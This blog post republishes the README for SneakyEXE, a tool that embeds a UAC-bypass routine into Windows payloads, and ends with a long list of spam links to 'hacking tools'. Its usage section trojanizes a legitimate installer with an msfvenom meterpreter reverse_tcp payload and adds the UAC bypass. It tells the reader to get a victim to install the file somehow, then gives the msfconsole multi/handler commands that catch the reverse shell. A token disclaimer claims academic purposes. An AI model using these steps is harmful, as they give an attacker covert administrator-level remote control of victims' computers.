sábado, 29 de agosto de 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Related links


  1. Nsa Hacker Tools
  2. Hacker Tools For Mac
  3. Hack Tools For Pc
  4. Hacker Tools Mac
  5. Pentest Tools Linux
  6. Hacking Tools For Pc
  7. Hacker Tool Kit
  8. Hacker Tools For Mac
  9. Pentest Tools Subdomain
  10. Pentest Tools For Windows
  11. Hacker Tools
  12. What Is Hacking Tools
  13. Hacking Tools Kit
  14. Hacking Tools For Pc
  15. Computer Hacker
  16. Pentest Tools Subdomain
  17. Hack Rom Tools
  18. How To Make Hacking Tools
  19. Hacking Tools For Windows
  20. Github Hacking Tools
  21. Pentest Tools Port Scanner
  22. Pentest Tools
  23. Pentest Tools Nmap
  24. Hacking Tools Windows 10
  25. Hackrf Tools
  26. Pentest Tools Url Fuzzer
  27. Hacker Tools Apk Download
  28. Pentest Tools Apk
  29. Hacker Search Tools
  30. Hacker Tools Apk Download
  31. Hacking Tools For Windows Free Download
  32. Best Hacking Tools 2020
  33. Hacking Tools For Beginners
  34. Hack Tools For Mac
  35. Pentest Tools For Mac
  36. Best Hacking Tools 2019
  37. Hack App
  38. Hacker Tools Mac
  39. Hackrf Tools
  40. Hack Rom Tools
  41. Tools For Hacker
  42. Hack Tools Mac
  43. Ethical Hacker Tools
  44. Pentest Box Tools Download
  45. Pentest Tools Linux
  46. Free Pentest Tools For Windows
  47. Pentest Tools Windows
  48. How To Make Hacking Tools
  49. Hack Tool Apk No Root
  50. Pentest Tools Android
  51. Hacking Tools Kit
  52. Pentest Tools Url Fuzzer
  53. Pentest Tools Linux
  54. Best Pentesting Tools 2018
  55. New Hacker Tools
  56. Hack Website Online Tool
  57. Pentest Tools Apk
  58. Hacker Tools For Pc
  59. Hacker Tools Linux
  60. Hacking Tools Kit
  61. Pentest Tools Linux
  62. World No 1 Hacker Software
  63. Top Pentest Tools
  64. Pentest Tools Url Fuzzer
  65. Hacker Tools Online
  66. Hacker Tools For Mac
  67. Bluetooth Hacking Tools Kali
  68. Hacker Tools Software
  69. What Is Hacking Tools
  70. Hacking Tools Github
  71. Computer Hacker
  72. Hacks And Tools
  73. Hacking Tools 2020
  74. Hacking Tools Free Download
  75. Hack Tools Download
  76. Nsa Hacker Tools
  77. Hak5 Tools
  78. Hacker Tools Apk Download
  79. Hacker Tools Linux

No hay comentarios:

Publicar un comentario